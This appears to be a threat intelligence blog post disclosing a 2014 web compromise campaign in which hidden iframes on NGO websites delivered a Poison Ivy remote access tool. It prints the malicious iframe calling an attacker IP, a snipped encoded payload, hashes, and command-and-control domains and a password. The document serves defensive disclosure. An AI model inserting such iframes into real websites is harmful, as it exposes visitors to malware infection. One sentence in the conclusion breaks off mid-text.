**Introduction:**

On September 24 2014, FireEye observed a new strategic web compromise (SWC) campaign that we

believe is targeting non-profit organizations and non-governmental organizations (NGO) by hosting

iframes on legitimate websites. The compromised websites contained an iframe to direct site visitors to a

threat actor-controlled IP address that dropped a Poison Ivy remote access tool (RAT) onto victims’

systems. FireEye has not yet attributed this activity though we have identified links to the Sunshop Digital

Quartermaster, a collective of malware authors that supports multiple China-based advanced persistent

threat (APT) groups. FireEye previously established detection measures for this threat activity, ensuring

our clients were prepared for these intrusion attempts well in advance of threat actor implementation.

**Activity Overview:**

On September 24, FireEye observed SWCs, likely conducted by a unitary threat group based on shared

infrastructure and tools, on at least three different websites: an international non-profit organization that

focuses on environmental advocacy, and two different NGOs that promote democracy and human rights.

The group was able to compromise these websites and insert malicious iframes. Figure 1 displays one of

the iframes. The threat group obfuscated the iframe on two of the compromised websites.

<div class=”views-field views-field-body”>    <div class=”fieldcontent”><p><iframe height=”0″
src=”http://103.27.108.45/img/js.php” width=”0″></iframe></p>

**Figure 1: The iframe that directed website visitors to a threat actor-controlled IP address**

The iframes on these websites directed visitors to Java exploits hosted at 103.27.108.45. In turn, these

exploits downloaded and decoded a payload hosted at: hxxp://103.27.108.45/img/js.php. A GET request

to this URI returned the following content:

<applet code=”NvTest.class”,height=”200″ width=”200″>

.<param name=”bin” value=’4D5A90……’

**Figure 2: The encoded payload (snipped for brevity)**

The ‘bin’ param shown in Figure 2 is decoded from ASCII into hex by the Java exploit. Once decoded,

FireEye identified the payload as a Poison Ivy variant. It had the following properties:

MD5         118fa558a6b5020b078739ef7bdac3a1


-----

Compile Time     2014 09 15 08:21:23

Import Hash     09d0478591d4f788cb3e5ea416c25237

The Poison Ivy variant was also code signed with the below certificate:

SHA1           47:8C:E3:D6:CC:17:60:D3:27:14:6A:36:C9:88:77:4D:27:83:6A:D4

MD5            82B582589D4A59BE0720F088ACAC67A3

Serial Number       581AE6B6ABAFD73AC85B1AEFBDB2555F

Common Name        zilliontek Co.,Ltd

Organization       zilliontek Co.,Ltd

Country          KR

State/Province      Gyeonggi-do

City           Suwon-si

Issue Date        Jan 12 00:00:00 2013 GMT

Expiration Date      Feb 20 23:59:59 2015 GMT

The backdoor also contained the below versioning info embedded in the RT_VERSION of one of the PE

resources:

LegalCopyright: Copyright 2012 Google Inc. All rights reserved.

InternalName: chrome_exe

ProcuctShortName: Chrome

FileVersion: 34.0.1847.131

CompanyName: Google Inc.

OrginaLFilename: chrome.exe

LegalTrademarks:

ProductName: Google Chrome

ComparyShortName: Google

LastChange: 265687

FileDescription: Google Chrome

Offcial Build: 1


-----

Translation: 0×0409 0x04b0

This versioning info attempted to masquerade as a Google Chrome file. However, the malware author

misspelled multiple words when attempting to put in versioning information for this particular build.

The Poison Ivy implant had the following configuration properties:

C2: quakegoogle.servequake.com, Port: 80

Password: qeTGd3485fF

Mutex: )!VoqA.I4

The C2 domain quakegoogle.servequake[.]com resolved to 115.126.62.100 at the time of the SWCs. Other

domains resolving to the same IP include the following:

assign.ddnsking.com

quakegoogle.servequake.com

picsgoogle.servepics.com

**Figure 3: Domains observed resolving to 115.126.62.100**

Between August 30, 2014 and September 16, 2014 we also observed SOGU (aka Kaba) callback traffic sent

to assign.ddnsking.com over port 443.

**Links to the Sunshop Digital Quartermaster**

The Poison Ivy backdoor also had a RT_MANIFEST PE resource with a SHA256 fingerprint of

82a98c88d3dd57a6ebc0fe7167a86875ed52ebddc6374ad640407efec01b1393.

This same RT_MANIFEST resource was documented in our previous Sunshop Digital Quartermaster

report. FireEye previously identified this specific RT_MANIFEST as the ‘Sunshop Manifest,’ and we have

observed this same manifest resource used in 86 other samples. As we stated in the Quartermaster report,

we believe this shared resource is an artifact of a builder toolkit made available to a number of China
based APT groups.

**Conclusion**

This activity represents a new SWC campaign. We suspect threat actors are leveraging their access to

compromised websites belonging to NGOs and non-profits to target other organizations in the same

industries. These websites are often visited by organization employees and other organizations in the same

industries, allowing threat actors to move laterally within already compromised networks or gain access to

new networks. While FireEye has not attributed this activity to a specific threat group, we frequently


-----

activity within their borders that may lead to domestic unrest or embarrass the Chinese government. For

example, in 2013, FireEye observed China-based threat actors steal grant applications and activity reports

specifically related to an international NGO’s China-based activities. We suspects threat actors sought to

monitor these programs and involved individuals. The three organizations whose websites are hosting the

malicious iframes have China-based operations.

FireEye is releasing information on this campaign to allow organizations to investigate and prepare for

this activity in their networks. We believe non-profits and NGOs remain at elevated risk of intrusion and

should be especially wary of attempts to compromise their networks using SWC. Threat actors may use

SWCs to achieve this goal, but FireEye does not discount the possibility that threat actors will use other

means at their disposal, including phishing. Based on past threat actor activity in this industry, FireEye

expects threat actors are motivated to steal programmatic data and monitor organizations’ programs in

specific countries. If China-based threat actors are behind the observed campaign, FireEye expects that

organizations with operations in China are high-priority targets. FireEye currently has detection measures

in place that should allow users of FireEye products to detect this SWC activity. It is also likely that other

industries or organizations were affected by this SWC activity, since these sites are public facing and

frequently visited.

Special thanks to Google’s Billy Leonard for providing additional information and research.

Thanks to the following authors for their contributions: Mike Oppenheim, Ned Moran, and Steve Stone.

[This entry was posted in Threat Intelligence, Threat Research by Sarah Engle and Ben Withnell.](http://www.fireeye.com/blog/category/technical/threat-intelligence)

[Bookmark the permalink.](http://www.fireeye.com/blog/technical/2014/09/aided-frame-aided-direction-because-its-a-redirect.html)


-----